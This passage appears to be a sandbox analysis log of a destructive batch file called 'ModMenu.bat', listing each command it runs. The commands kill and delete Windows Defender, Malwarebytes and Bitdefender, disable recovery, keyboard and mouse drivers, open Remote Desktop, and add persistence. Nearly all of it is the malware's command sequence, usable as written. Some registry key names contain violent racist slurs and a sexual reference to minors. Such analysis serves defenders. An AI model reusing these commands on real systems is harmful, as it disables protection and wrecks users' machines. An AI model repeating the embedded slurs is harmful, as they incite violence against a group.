    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:3976
  - - C:\Windows\system32\openfiles.exe
      openfiles
      4⤵
      PID:4504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(new-object -com shell.application).minimizeall()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:5808
  - - C:\Windows\system32\curl.exe
      curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
      4⤵
      PID:5892
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:4268
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
      4⤵
      PID:4660
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
      4⤵
      PID:4708
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:4544
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
      4⤵
      PID:1372
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
      4⤵
      PID:4036
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:3328
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
      4⤵
      PID:4688
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5488
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:3160
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:5444
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5908
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:236
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start=disabled
      4⤵
      PID:1352
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:3556
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:1388
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:5608
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:5272
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:2464
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:1908
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
      4⤵
      PID:6140
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
      4⤵
      PID:3828
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:5852
  - - C:\Windows\system32\cmd.exe
      cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
      4⤵
      PID:5876
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4932
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6044
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1860
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      4⤵
      PID:5368
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
      4⤵
      PID:724
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
      4⤵
      PID:3224
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
      4⤵
      PID:5380
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      4⤵
      PID:5092
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
      4⤵
      PID:5072
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
      4⤵
      PID:2116
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:5304
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
      4⤵
      PID:5132
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
      4⤵
      PID:3168
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:1336
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6056
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:768
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:580
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1920
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4100
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /deletevalue {default} recoveryenabled
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3420
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
      4⤵
      PID:4260
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:3660
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:5732
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:5716
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:2080
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:3840
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:1368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableAntiTamper $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5836
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3224
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5240
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbam.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5044
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MBAMService.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:300
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamtray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5236
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamscheduler.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3168
  - - C:\Windows\system32\sc.exe
      sc stop MBAMService
      4⤵
      Launches sc.exe
      PID:3752
  - - C:\Windows\system32\sc.exe
      sc delete MBAMService
      4⤵
      Launches sc.exe
      PID:3764
  - - C:\Windows\system32\sc.exe
      sc stop MBAMProtector
      4⤵
      Launches sc.exe
      PID:4304
  - - C:\Windows\system32\sc.exe
      sc delete MBAMProtector
      4⤵
      Launches sc.exe
      PID:3648
  - - C:\Windows\system32\sc.exe
      sc stop MBAMChameleon
      4⤵
      Launches sc.exe
      PID:4428
  - - C:\Windows\system32\sc.exe
      sc delete MBAMChameleon
      4⤵
      Launches sc.exe
      PID:5736
  - - C:\Windows\system32\sc.exe
      sc stop MBAMFarflt
      4⤵
      Launches sc.exe
      PID:5476
  - - C:\Windows\system32\sc.exe
      sc delete MBAMFarflt
      4⤵
      Launches sc.exe
      PID:5228
  - - C:\Windows\system32\sc.exe
      sc stop MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:5144
  - - C:\Windows\system32\sc.exe
      sc delete MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:3148
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:3804
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:4724
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
      4⤵
      PID:2100
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
      4⤵
      PID:1960
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
      4⤵
      PID:2272
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
      4⤵
      PID:4088
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdservicehost.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2128
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdagent.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5320
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdredline.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4516
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdparentalservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5744
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdreinit.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4660
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdsubwiz.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4492
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM seccenter.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4824
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM vsserv.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3080
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM epssecurityservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1980
  - - C:\Windows\system32\sc.exe
      sc stop bdservicehost
      4⤵
      Launches sc.exe
      PID:236
  - - C:\Windows\system32\sc.exe
      sc delete bdservicehost
      4⤵
      PID:1176
  - - C:\Windows\system32\sc.exe
      sc stop bdagent
      4⤵
      Launches sc.exe
      PID:856
  - - C:\Windows\system32\sc.exe
      sc delete bdagent
      4⤵
      Launches sc.exe
      PID:4664
  - - C:\Windows\system32\sc.exe
      sc stop bdredline
      4⤵
      Launches sc.exe
      PID:1016
  - - C:\Windows\system32\sc.exe
      sc delete bdredline
      4⤵
      Launches sc.exe
      PID:3784
  - - C:\Windows\system32\sc.exe
      sc stop bdparentalservice
      4⤵
      PID:3860
  - - C:\Windows\system32\sc.exe
      sc delete bdparentalservice
      4⤵
      Launches sc.exe
      PID:5704
  - - C:\Windows\system32\sc.exe
      sc stop bdreinit
      4⤵
      PID:4012
  - - C:\Windows\system32\sc.exe
      sc delete bdreinit
      4⤵
      Launches sc.exe
      PID:780
  - - C:\Windows\system32\sc.exe
      sc stop bdsubwiz
      4⤵
      Launches sc.exe
      PID:2664
  - - C:\Windows\system32\sc.exe
      sc delete bdsubwiz
      4⤵
      PID:3828
  - - C:\Windows\system32\sc.exe
      sc stop seccenter
      4⤵
      Launches sc.exe
      PID:4104
  - - C:\Windows\system32\sc.exe
      sc delete seccenter
      4⤵
      Launches sc.exe
      PID:2324
  - - C:\Windows\system32\sc.exe
      sc stop vsserv
      4⤵
      PID:2976
  - - C:\Windows\system32\sc.exe
      sc delete vsserv
      4⤵
      Launches sc.exe
      PID:1656
  - - C:\Windows\system32\sc.exe
      sc stop epssecurityservice
      4⤵
      Launches sc.exe
      PID:1888
  - - C:\Windows\system32\sc.exe
      sc delete epssecurityservice
      4⤵
      Launches sc.exe
      PID:2832
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
      4⤵
      PID:1392
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
      4⤵
      PID:2016
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
      4⤵
      PID:1440
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
      4⤵
      PID:5424
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
      4⤵
      PID:5004
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
      4⤵
      PID:2464
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
      4⤵
      PID:2172
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
      4⤵
      PID:3708
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
      4⤵
      PID:132
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
      4⤵
      PID:4884
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
      4⤵
      PID:5276
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4228
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:740
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:1540
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:4476
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
      4⤵
      PID:1716
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      PID:4404
  - - C:\Windows\system32\sc.exe
      sc delete WinDefend
      4⤵
      Launches sc.exe
      PID:1616
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      Launches sc.exe
      PID:728
  - - C:\Windows\system32\sc.exe
      sc delete SecurityHealthService
      4⤵
      Launches sc.exe
      PID:2008
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      Launches sc.exe
      PID:3092
  - - C:\Windows\system32\sc.exe
      sc delete Sense
      4⤵
      PID:1444
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MsMpEng.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3376
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MpCmdRun.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1856
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SecurityHealthSystray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3480
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM smartscreen.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4408
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5836
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4880
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:296
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1072
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
      4⤵
      PID:5212
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
      4⤵
      PID:3620
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
      4⤵
      PID:4448
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
      4⤵
      PID:3732
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\notepad.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4668
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4712
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\calc.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1700
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5692
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5916
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2692
  - - C:\Windows\system32\powercfg.exe
      powercfg /hibernate off REM Disables hibernation
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2272
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:484
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1972
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:5728
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "Device Name"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      Suspicious use of AdjustPrivilegeToken
      PID:5884
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "USB Root Hub"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:4240
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
      4⤵
      Adds Run key to start application
      PID:1848
  - - C:\Windows\system32\reg.exe
      reg add "HKCR\behead all niggers" /f
      4⤵
      Modifies registry class
      PID:2080
  - - C:\Windows\system32\reg.exe
      reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
      4⤵
      PID:2280
  - - C:\Windows\system32\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
      4⤵
      PID:5716
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
      4⤵
      Adds Run key to start application
      PID:5200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
      4⤵
      PID:4840
    - - C:\Windows\system32\reg.exe
        
        reg query "HKU" /s /f "Software" /k
        5⤵
        
        PID:5944
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5296
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5844
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:2140
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5444
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5596
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:6060
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:6076
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1928
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:4828
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1980
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Rasauq on top" /f
      4⤵
      PID:6080
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f
      4⤵
      PID:1176
  - - C:\Windows\system32\reg.exe
